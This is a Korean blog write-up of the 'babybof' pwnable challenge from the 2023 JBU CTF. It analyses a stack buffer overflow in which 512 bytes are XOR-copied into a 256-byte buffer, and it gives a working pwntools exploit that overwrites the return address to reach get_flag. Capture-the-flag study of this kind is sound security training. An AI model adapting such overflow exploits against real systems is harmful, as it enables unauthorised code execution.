[2023 JBU CTF] babybof write-up

CTF

[2023 JBU CTF] babybof write-up

e_yejun 2023. 10. 28. 21:39

분야 : Pwnable

🧐 문제

문제명 : babybof

bof가 발생함을 인지하고, xor 연산 값에 맞춰 페이로드를 구성하여 익스플로잇하는 문제이다.

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 실제 문제 플래그를 획득할 수 있다.

🧐 분석

babybof 바이너리를 분석해보자.

먼저, 메모리 보호기법은 NX bit가 걸려있고, Canary와 PIE가 걸려있지 않다.

바이너리를 디컴파일하여 코드를 분석한다.

먼저, get_flag함수가 있다. 해당 함수를 호출하면 /home/RET/flag를 읽어서 출력해주기 때문에 flag를 획득할 수 있다.

main함수에서 vuln함수를 호출한다. 이때, main 함수의 지역변수인 v4의 주소를 인자로 넘긴다.

vuln함수이다. 지역변수 v2를 선언하고, 문자열을 입력받는다. 이때, v2의 크기는 **512byte**이다.

이후, xor_data 함수에 main함수에서 넘어온 a1(포인터)와 vuln함수의 v2변수 주소를 넘긴다.

xor_data함수에서 a2의 길이만큼 a2를 a1에 값을 복사하는 과정에서 bof가 발생한다.

위 vuln함수의 v2는 **512byte**이고, main함수의 v4는 **256byte**이다. 따라서, vuln함수의 v2길이만큼 복사하게 되면, main함수의 v4 버퍼에서 오버플로우가 발생하여 RET overwrite 할 수 있다.

따라서, vuln함수의 v2에서 A를 264byte(v4+SFP)만큼 채우고, get_flag함수의 주소를 넣으면 main함수가 끝날 때, get_flag함수로 return하여 플래그를 얻을 수 있다.

또한, xor_data함수에서 값을 복사해주는 부분을 보면 **a2[i]^88**의 결과 값이 **a1[i]**에 들어간다. 따라서, 우리는 payload^88를 넘겨주면 된다.

🧐 익스플로잇

from pwn import *

#p = process('./babybof')
e = ELF('./babybof')
p = remote('192.168.83.137', 13571)

get_shell = e.symbols['get_flag']

payload = b''
payload += b'A'* (0x100 + 8)
payload += p64(get_shell)

payload_xor = ''
for i in payload:
    payload_xor += chr(i^88)

print(hex(get_shell))
print(payload_xor)

p.sendline(payload_xor)

p.interactive()

해당 exploit 코드를 실행하면 플래그를 얻을 수 있다.